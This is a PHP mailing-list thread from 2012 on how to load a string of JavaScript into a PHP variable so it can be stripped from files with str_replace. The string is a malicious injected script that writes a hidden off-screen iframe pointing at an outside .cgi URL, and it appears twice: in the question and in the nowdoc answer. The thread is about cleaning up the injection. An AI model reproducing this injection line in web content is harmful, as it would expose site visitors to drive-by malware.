On 13/12/2012, at 10:08 AM, Curtis Maurand <curtis@xxxxxxxxxxx> wrote:
> On 12/12/2012 3:47 PM, Maciek Sokolewicz wrote:
>> On 12-12-2012 21:10, Curtis Maurand wrote:
>>> On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote:
>>>> On 12-12-2012 17:11, Curtis Maurand wrote:
>>>>
>>>> First of all, why do you want to use preg_replace when you're not
>>>> actually using regular expressions??? Use str_replace or stri_replace
>>>> instead.
>>>>
>>>> Aside from that, escapeshellarg() escapes strings for use in shell
>>>> execution. Perl Regexps are not shell commands. It's like using
>>>> mysqli_real_escape_string() to escape arguments for URLs. That doesn't
>>>> compute, just like your way doesn't either.
>>>>
>>>> If you DO wish to escape arguments for a regular expression, use
>>>> preg_quote instead, that's what it's there for. But first, reconsider
>>>> using preg_replace, since I honestly don't think you need it at all if
>>>> the way you've posted
>>>> (preg_replace(escapeshellarg($string),$replacement)) is the way you
>>>> want to use it.
>>> Thanks for your response. I'm open to to using str_replace. no issue
>>> there. my main question was how to properly get a string of javascript
>>> into a string that could then be processed. I'm not sure I can just put
>>> that in quotes and have it work. There are colons, "<",">",
>>> semicolons, and doublequotes. Do I just need to rifle through the
>>> string and escape the reserved characters or is there a function for that?
>>>
>>> --C
>>
>> Why do you want to escape them? There are no reserved characters in the case of str_replace. You don't have to put anything in quotes. For example:
>>
>> $string = 'This is a <string with various supposedly "reserved" ``\\ _- characters'
>> echo str_replace('supposedly', 'imaginary', $string)
>> would return:
>> This is a <string with imaginary "reserved" ``\\- characters
>>
>> So... why do you want to "escape" these characters?
>>
> So what about things like quotes within the string or semi-colons, colons and slashes? Don't these need to be escaped when you're loading a string into a variable?
>
> ;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://nrwhuejbd.freewww.com/34e2b2349bdf29216e455cbc7b6491aa.cgi??8";></iframe>');
>
> I need to enclose this entire string and replace it with ""
>
> Thanks
The only thing you have to worry about is quotes characters. Assuming you're running 5.3+, just use now docs (http://php.net/manual/en/language.types.string.php#language.types.string.syntax.nowdoc).
$String = <<<'STRING'
;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://nrwhuejbd.freewww.com/34e2b2349bdf29216e455cbc7b6491aa.cgi??8";></iframe>');
STRING;
---
Simon Welsh
Admin of http://simon.geek.nz/
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
